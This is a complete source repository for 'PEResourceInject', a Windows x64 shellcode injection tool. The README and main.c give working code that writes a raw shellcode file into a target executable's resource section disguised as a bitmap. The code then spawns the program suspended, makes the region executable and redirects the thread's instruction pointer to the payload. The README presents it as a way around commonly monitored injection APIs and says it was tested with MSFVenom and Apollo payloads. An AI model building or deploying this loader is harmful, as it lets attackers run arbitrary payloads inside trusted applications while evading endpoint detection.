├── LICENSE
├── PEResourceInject.sln
├── PEResourceInject.vcxproj
├── README.md
├── main.c
└── main.h


/LICENSE:
--------------------------------------------------------------------------------
 1 | BSD 3-Clause License
 2 | 
 3 | Copyright (c) 2022, Wra7h
 4 | All rights reserved.
 5 | 
 6 | Redistribution and use in source and binary forms, with or without
 7 | modification, are permitted provided that the following conditions are met:
 8 | 
 9 | 1. Redistributions of source code must retain the above copyright notice, this
10 |    list of conditions and the following disclaimer.
11 | 
12 | 2. Redistributions in binary form must reproduce the above copyright notice,
13 |    this list of conditions and the following disclaimer in the documentation
14 |    and/or other materials provided with the distribution.
15 | 
16 | 3. Neither the name of the copyright holder nor the names of its
17 |    contributors may be used to endorse or promote products derived from
18 |    this software without specific prior written permission.
19 | 
20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
30 | 


--------------------------------------------------------------------------------
/PEResourceInject.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 17
 4 | VisualStudioVersion = 17.2.32616.157
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "PEResourceInject", "PEResourceInject.vcxproj", "{FF01AF50-4737-475A-88AC-77A66F332537}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{FF01AF50-4737-475A-88AC-77A66F332537}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{FF01AF50-4737-475A-88AC-77A66F332537}.Debug|x64.Build.0 = Debug|x64
18 | 		{FF01AF50-4737-475A-88AC-77A66F332537}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{FF01AF50-4737-475A-88AC-77A66F332537}.Debug|x86.Build.0 = Debug|Win32
20 | 		{FF01AF50-4737-475A-88AC-77A66F332537}.Release|x64.ActiveCfg = Release|x64
21 | 		{FF01AF50-4737-475A-88AC-77A66F332537}.Release|x64.Build.0 = Release|x64
22 | 		{FF01AF50-4737-475A-88AC-77A66F332537}.Release|x86.ActiveCfg = Release|Win32
23 | 		{FF01AF50-4737-475A-88AC-77A66F332537}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | 	GlobalSection(ExtensibilityGlobals) = postSolution
29 | 		SolutionGuid = {3E999D3B-812A-4B92-B928-B1CA4C28A7A6}
30 | 	EndGlobalSection
31 | EndGlobal
32 | 


--------------------------------------------------------------------------------
/PEResourceInject.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <ItemGroup>
 22 |     <ClCompile Include="main.c" />
 23 |   </ItemGroup>
 24 |   <ItemGroup>
 25 |     <ClInclude Include="main.h" />
 26 |   </ItemGroup>
 27 |   <PropertyGroup Label="Globals">
 28 |     <VCProjectVersion>16.0</VCProjectVersion>
 29 |     <Keyword>Win32Proj</Keyword>
 30 |     <ProjectGuid>{ff01af50-4737-475a-88ac-77a66f332537}</ProjectGuid>
 31 |     <RootNamespace>PEResourceInject</RootNamespace>
 32 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 33 |   </PropertyGroup>
 34 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <UseDebugLibraries>true</UseDebugLibraries>
 38 |     <PlatformToolset>v143</PlatformToolset>
 39 |     <CharacterSet>Unicode</CharacterSet>
 40 |   </PropertyGroup>
 41 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 42 |     <ConfigurationType>Application</ConfigurationType>
 43 |     <UseDebugLibraries>false</UseDebugLibraries>
 44 |     <PlatformToolset>v143</PlatformToolset>
 45 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 49 |     <ConfigurationType>Application</ConfigurationType>
 50 |     <UseDebugLibraries>true</UseDebugLibraries>
 51 |     <PlatformToolset>v143</PlatformToolset>
 52 |     <CharacterSet>Unicode</CharacterSet>
 53 |   </PropertyGroup>
 54 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 55 |     <ConfigurationType>Application</ConfigurationType>
 56 |     <UseDebugLibraries>false</UseDebugLibraries>
 57 |     <PlatformToolset>v143</PlatformToolset>
 58 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 59 |     <CharacterSet>Unicode</CharacterSet>
 60 |   </PropertyGroup>
 61 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 62 |   <ImportGroup Label="ExtensionSettings">
 63 |   </ImportGroup>
 64 |   <ImportGroup Label="Shared">
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 73 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 74 |   </ImportGroup>
 75 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 76 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 77 |   </ImportGroup>
 78 |   <PropertyGroup Label="UserMacros" />
 79 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 80 |     <ClCompile>
 81 |       <WarningLevel>Level3</WarningLevel>
 82 |       <SDLCheck>true</SDLCheck>
 83 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 84 |       <ConformanceMode>true</ConformanceMode>
 85 |     </ClCompile>
 86 |     <Link>
 87 |       <SubSystem>Console</SubSystem>
 88 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 89 |     </Link>
 90 |   </ItemDefinitionGroup>
 91 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 92 |     <ClCompile>
 93 |       <WarningLevel>Level3</WarningLevel>
 94 |       <FunctionLevelLinking>true</FunctionLevelLinking>
 95 |       <IntrinsicFunctions>true</IntrinsicFunctions>
 96 |       <SDLCheck>true</SDLCheck>
 97 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 98 |       <ConformanceMode>true</ConformanceMode>
 99 |     </ClCompile>
100 |     <Link>
101 |       <SubSystem>Console</SubSystem>
102 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
103 |       <OptimizeReferences>true</OptimizeReferences>
104 |       <GenerateDebugInformation>true</GenerateDebugInformation>
105 |     </Link>
106 |   </ItemDefinitionGroup>
107 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
108 |     <ClCompile>
109 |       <WarningLevel>Level3</WarningLevel>
110 |       <SDLCheck>true</SDLCheck>
111 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
112 |       <ConformanceMode>true</ConformanceMode>
113 |     </ClCompile>
114 |     <Link>
115 |       <SubSystem>Console</SubSystem>
116 |       <GenerateDebugInformation>true</GenerateDebugInformation>
117 |     </Link>
118 |   </ItemDefinitionGroup>
119 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
120 |     <ClCompile>
121 |       <WarningLevel>Level3</WarningLevel>
122 |       <FunctionLevelLinking>true</FunctionLevelLinking>
123 |       <IntrinsicFunctions>true</IntrinsicFunctions>
124 |       <SDLCheck>true</SDLCheck>
125 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
126 |       <ConformanceMode>true</ConformanceMode>
127 |     </ClCompile>
128 |     <Link>
129 |       <SubSystem>Console</SubSystem>
130 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
131 |       <OptimizeReferences>true</OptimizeReferences>
132 |       <GenerateDebugInformation>true</GenerateDebugInformation>
133 |     </Link>
134 |   </ItemDefinitionGroup>
135 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
136 |   <ImportGroup Label="ExtensionTargets">
137 |   </ImportGroup>
138 | </Project>


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # PEResourceInject
 2 | A way to avoid using VirtualAllocEx/WriteProcessMemory to inject shellcode into a process. You need access to modify the target executable.  
 3 | 
 4 | If the target exe has a .rsrc section already, it is overwritten with the new resource. However if the exe did not have a .rsrc, the section is added before being spawned.
 5 | 
 6 | - Write shellcode to the target's .rsrc as a bitmap using the UpdateResource APIs
 7 | - Spawn the exe suspended
 8 | - Calculate the shellcode location by parsing the PE header
 9 | - VirtualProtectEx to RX
10 | - Get/SetThreadContext to execute
11 | 
12 | ## Usage (x64 only)  
13 | `PEResourceInject.exe -exe <C:\path\to\target.exe> -bin <C:\Path\to\raw\shellcode.bin>`
14 | 
15 | Tested with:  
16 | - MS Office/VLC/FireFox 
17 | - Shellcode: MSFVenom/Apollo
18 | 
19 | ### References/APIs:  
20 | [A dive into the PE file format by 0xRick](https://0xrick.github.io/win-internals/pe8/)  
21 |     
22 | [BeginUpdateResource](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-beginupdateresourcea)  
23 | [UpdateResource](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-updateresourcea)  
24 | [EndUpdateResource](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-endupdateresourcea)  
25 | 


--------------------------------------------------------------------------------
/main.c:
--------------------------------------------------------------------------------
  1 | #include <stdio.h>
  2 | #include <Windows.h>
  3 | #include <winternl.h>
  4 | 
  5 | #include "main.h"
  6 | 
  7 | int wmain(INT argc, WCHAR* argv[])
  8 | {
  9 | 	PWCHAR TargetProcess = NULL;
 10 | 	WCHAR TargetProcessCopy[FILENAME_MAX];
 11 | 	PWCHAR ShellcodePath = NULL;
 12 | 	PCHAR Payload = NULL;
 13 | 
 14 | 	INT Ret = FALSE;
 15 | 	SIZE_T cTPLen = 0;
 16 | 	DWORD PayloadBufferSize = 0;
 17 | 	DWORD cbRet = 0;
 18 | 	DWORD dwOldProtect = 0;
 19 | 	DWORD_PTR AddressShellcodeStart = 0;
 20 | 	DWORD_PTR PEBOffset = 0;
 21 | 	DWORD_PTR ImageBase = 0;
 22 | 	HANDLE hUpdate = NULL;
 23 | 	NTSTATUS ntStatus = NOERROR;
 24 | 	SIZE_T cbRead = 0;
 25 | 
 26 | 	STARTUPINFO sStartInfo = { 0 };
 27 | 	PROCESS_INFORMATION sProcInfo = { 0 };
 28 | 	PROCESS_BASIC_INFORMATION sPBI = { 0 };
 29 | 	IMAGE_DOS_HEADER sImageDOSHeader = { 0 };
 30 | 	IMAGE_NT_HEADERS64 sImageNTHeader = { 0 };
 31 | 	IMAGE_SECTION_HEADER sImageSectionHeader = { 0 };
 32 | 	CONTEXT sCtx = { 0 };
 33 | 
 34 | 
 35 | 	for (INT i = 1; i < argc; i++)
 36 | 	{
 37 | 		if (wcscmp(argv[i], L"-exe") == 0)
 38 | 		{
 39 | 			TargetProcess = argv[i + 1];
 40 | 			i++;
 41 | 		}
 42 | 		else if (wcscmp(argv[i], L"-bin") == 0)
 43 | 		{
 44 | 			ShellcodePath = argv[i + 1];
 45 | 			i++;
 46 | 		}
 47 | 		else if (wcscmp(argv[i], L"-h") == 0 || wcscmp(argv[i], L"-help") == 0)
 48 | 		{
 49 | 			printf("\nUsage: -exe <C:\\Absolute\\Path\\To\\exe> -bin <C:\\Absolute\\Path\\To\\Raw\\Shellcode>\n\n");
 50 | 			printf("-exe : path to the executable to spawn/inject\n");
 51 | 			printf("-bin : path to raw shellcode\n");
 52 | 			exit(0);
 53 | 		}
 54 | 	}
 55 | 
 56 | 	if (!TargetProcess || !ShellcodePath)
 57 | 	{
 58 | 		printf("\nUsage: -exe <C:\\Absolute\\Path\\To\\exe> -bin <C:\\Absolute\\Path\\To\\Raw\\Shellcode>\n\n");
 59 | 		printf("-exe : path to the executable to spawn/inject\n");
 60 | 		printf("-bin : path to raw shellcode\n");
 61 | 		exit(1);
 62 | 	}
 63 | 
 64 | 	//First create a backup of the TargetProcess file.
 65 | 	cTPLen = wcslen(TargetProcess);
 66 | 	wcscpy_s(TargetProcessCopy, FILENAME_MAX, TargetProcess);
 67 | 	//Replace the '.' with '_' to avoid name collision.
 68 | 	TargetProcessCopy[(cTPLen)-4] = '_';
 69 | 
 70 | 	Ret = CopyFile(TargetProcess, TargetProcessCopy, FALSE);
 71 | 	if (!Ret)
 72 | 	{
 73 | 		printf("[!] Failed to make a back up of the target exe. Exiting...\n");
 74 | 		goto CLEANUP;
 75 | 	}
 76 | 	printf("[+] Backup Created: %ls\n", TargetProcessCopy);
 77 | 
 78 | 	Ret = ReadContents(ShellcodePath, &Payload, &PayloadBufferSize);
 79 | 	if (!Ret)
 80 | 	{
 81 | 		printf("[!] Payload is empty. Exiting...\n");
 82 | 		goto CLEANUP;
 83 | 	}
 84 | 
 85 | 	//Attempt to update the resource of the executable we want to spawn.
 86 | 	hUpdate = BeginUpdateResource(TargetProcess, TRUE);
 87 | 	if (!hUpdate)
 88 | 		goto CLEANUP;
 89 | 
 90 | 	Ret = UpdateResource(hUpdate, RT_BITMAP, MAKEINTRESOURCE(RT_BITMAP), 0, Payload, PayloadBufferSize);
 91 | 	if (!Ret)
 92 | 		goto CLEANUP;
 93 | 
 94 | 	Ret = EndUpdateResource(hUpdate, FALSE);
 95 | 	if (!Ret)
 96 | 		goto CLEANUP;
 97 | 
 98 | 	printf("[+] Resource Updated: %ls\n", TargetProcess);
 99 | 
100 | 	//Spawn the process as suspended
101 | 	Ret = CreateProcessW(TargetProcess, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &sStartInfo, &sProcInfo);
102 | 	if (!Ret)
103 | 		goto CLEANUP;
104 | 
105 | 	printf("[+] Spawned: %ls\n", TargetProcess);
106 | 
107 | 	//Grab NtQueryInformationProcess
108 | 	pfnNtQueryInformationProcess pNtQueryInformationProcess;
109 | 	HMODULE hNtDll = LoadLibrary(L"NtDll.dll");
110 | 	pNtQueryInformationProcess = (pfnNtQueryInformationProcess)GetProcAddress(hNtDll, "NtQueryInformationProcess");
111 | 	FreeLibrary(hNtDll);
112 | 
113 | 	ntStatus = pNtQueryInformationProcess(sProcInfo.hProcess, ProcessBasicInformation, &sPBI, sizeof(PROCESS_BASIC_INFORMATION), &cbRet);
114 | 	if (ntStatus) // 0 = SUCCESS
115 | 		goto CLEANUP;
116 | 
117 | 	PEBOffset = (DWORD_PTR)sPBI.PebBaseAddress + 0x10; //x64
118 | 
119 | 	//With the PEB address, get the address of the image base
120 | 	Ret = ReadProcessMemory(sProcInfo.hProcess, (LPCVOID)PEBOffset, &ImageBase, 8, NULL);
121 | 	if (!Ret)
122 | 		goto CLEANUP;
123 | 
124 | 	printf("[+] Image Base: 0x%p\n", (PVOID)ImageBase);
125 | 
126 | 	//From ImageBase, populate a IMAGE_DOS_HEADER to get the e_lfanew
127 | 	Ret = ReadProcessMemory(sProcInfo.hProcess, (LPCVOID)ImageBase, &sImageDOSHeader, sizeof(IMAGE_DOS_HEADER), &cbRead);
128 | 	if (!Ret)
129 | 		goto CLEANUP;
130 | 
131 | 	//Add the imagebase + the value of the e_lfanew to get the start of the IMAGE_NT_HEADERS
132 | 	DWORD_PTR AddressImageNTHeader = ((DWORD_PTR)ImageBase + sImageDOSHeader.e_lfanew);
133 | 	Ret = ReadProcessMemory(sProcInfo.hProcess, (LPCVOID)AddressImageNTHeader, &sImageNTHeader, sizeof(IMAGE_NT_HEADERS64), &cbRead);
134 | 	if (!Ret)
135 | 		goto CLEANUP;
136 | 
137 | 	//Moving on to sections, get the address of the first section
138 | 	DWORD_PTR AddressOfSection = AddressImageNTHeader + (DWORD_PTR)(sizeof(DWORD) + sizeof(IMAGE_FILE_HEADER) + sImageNTHeader.FileHeader.SizeOfOptionalHeader);
139 | 
140 | 	// Identify which section is the .rsrc section which should contain the bitmap of our shellcode.
141 | 	for (int i = 0; i < sImageNTHeader.FileHeader.NumberOfSections; i++) {
142 | 
143 | 		ReadProcessMemory(sProcInfo.hProcess, (LPCVOID)AddressOfSection, &sImageSectionHeader, sizeof(IMAGE_SECTION_HEADER), &cbRead);
144 | 		if (strcmp(sImageSectionHeader.Name, ".rsrc") == 0)
145 | 		{
146 | 			// We found the .rsrc section, so take the Address of the Image base, add the virtual address of the .rsrc Section, 
147 | 			// which gets us to the start of the bitmap. From the start of the bitmap, add another 0x58 to get the start of the shellcode
148 | 			AddressShellcodeStart = (DWORD_PTR)ImageBase + (DWORD_PTR)sImageSectionHeader.VirtualAddress + 0x58;
149 | 
150 | 			printf("[+] .rsrc Image Section RVA: 0x%p\n", (PVOID)sImageSectionHeader.VirtualAddress);
151 | 			printf("[MATH] ImageBase[0x%p] + .rsrc RVA[0x%p] + BitmapHeader[0x58]\n", (PVOID)ImageBase, (PVOID)sImageSectionHeader.VirtualAddress);
152 | 			printf("[+] Shellcode Start: 0x%p\n", (PVOID)AddressShellcodeStart);
153 | 
154 | 			//Ensure protections are PAGE_EXECUTE_READ
155 | 			Ret = VirtualProtectEx(sProcInfo.hProcess, (LPVOID)AddressShellcodeStart, PayloadBufferSize, PAGE_EXECUTE_READ, &dwOldProtect);
156 | 			if (!Ret)
157 | 				goto CLEANUP;
158 | 
159 | 			break;
160 | 		}
161 | 		//.rsrc wasn't found, move to the start of the next section
162 | 		AddressOfSection += sizeof(IMAGE_SECTION_HEADER);
163 | 	}
164 | 
165 | 	if (!AddressShellcodeStart)
166 | 		goto CLEANUP;
167 | 
168 | 	//Execute the shellcode
169 | 	sCtx.ContextFlags = CONTEXT_ALL;
170 | 	GetThreadContext(sProcInfo.hThread, &sCtx);
171 | 	sCtx.Rip = (DWORD64)AddressShellcodeStart;
172 | 	SetThreadContext(sProcInfo.hThread, &sCtx);
173 | 	ResumeThread(sProcInfo.hThread);
174 | 
175 | CLEANUP:
176 | 	if (Payload)
177 | 	{
178 | 		free(Payload);
179 | 	}
180 | 
181 | 	if (sProcInfo.hProcess != NULL)
182 | 	{
183 | 		CloseHandle(sProcInfo.hThread);
184 | 		CloseHandle(sProcInfo.hProcess);
185 | 	}
186 | 
187 | 	printf("\n[~] Done!");
188 | 
189 | 	return 0;
190 | }
191 | 
192 | INT ReadContents(PWSTR Filepath, PCHAR* Buffer, PDWORD BufferSize)
193 | {
194 | 	FILE* f = NULL;
195 | 	_wfopen_s(&f, Filepath, L"rb");
196 | 	if (f)
197 | 	{
198 | 		fseek(f, 0, SEEK_END);
199 | 		*BufferSize = ftell(f);
200 | 		fseek(f, 0, SEEK_SET);
201 | 		*Buffer = malloc(*BufferSize);
202 | 		fread(*Buffer, *BufferSize, 1, f);
203 | 		fclose(f);
204 | 	}
205 | 
206 | 	return (*BufferSize != 0) ? TRUE : FALSE;
207 | }


--------------------------------------------------------------------------------
/main.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | typedef NTSTATUS(NTAPI* pfnNtQueryInformationProcess)(
 3 | 	IN  HANDLE ProcessHandle,
 4 | 	IN  PROCESSINFOCLASS ProcessInformationClass,
 5 | 	OUT PVOID ProcessInformation,
 6 | 	IN  ULONG ProcessInformationLength,
 7 | 	OUT PULONG ReturnLength    OPTIONAL
 8 | 	);
 9 | 
10 | INT ReadContents(PWSTR Filepath, PCHAR* Buffer, PDWORD BufferSize);


--------------------------------------------------------------------------------